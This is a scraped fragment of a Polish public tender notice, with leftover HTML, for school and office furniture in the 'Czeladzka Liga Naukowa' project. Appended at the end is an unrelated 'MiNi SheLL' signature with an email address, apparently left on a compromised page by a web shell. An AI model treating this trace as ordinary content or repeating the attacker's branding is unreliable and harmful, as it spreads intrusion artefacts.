39.16.00.00-1 - Meble szkolne;
Przedmiotem zamówienia jest dostawa pomocy dydaktycznych do prowadzenia dodatkowych zajęć wyrównawczych oraz poszerzających i kształcących kompetencje matematyczno - przyrodnicze w ramach projektu Czeladzka Liga Naukowa w tym:  część siódma - Meble biurowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com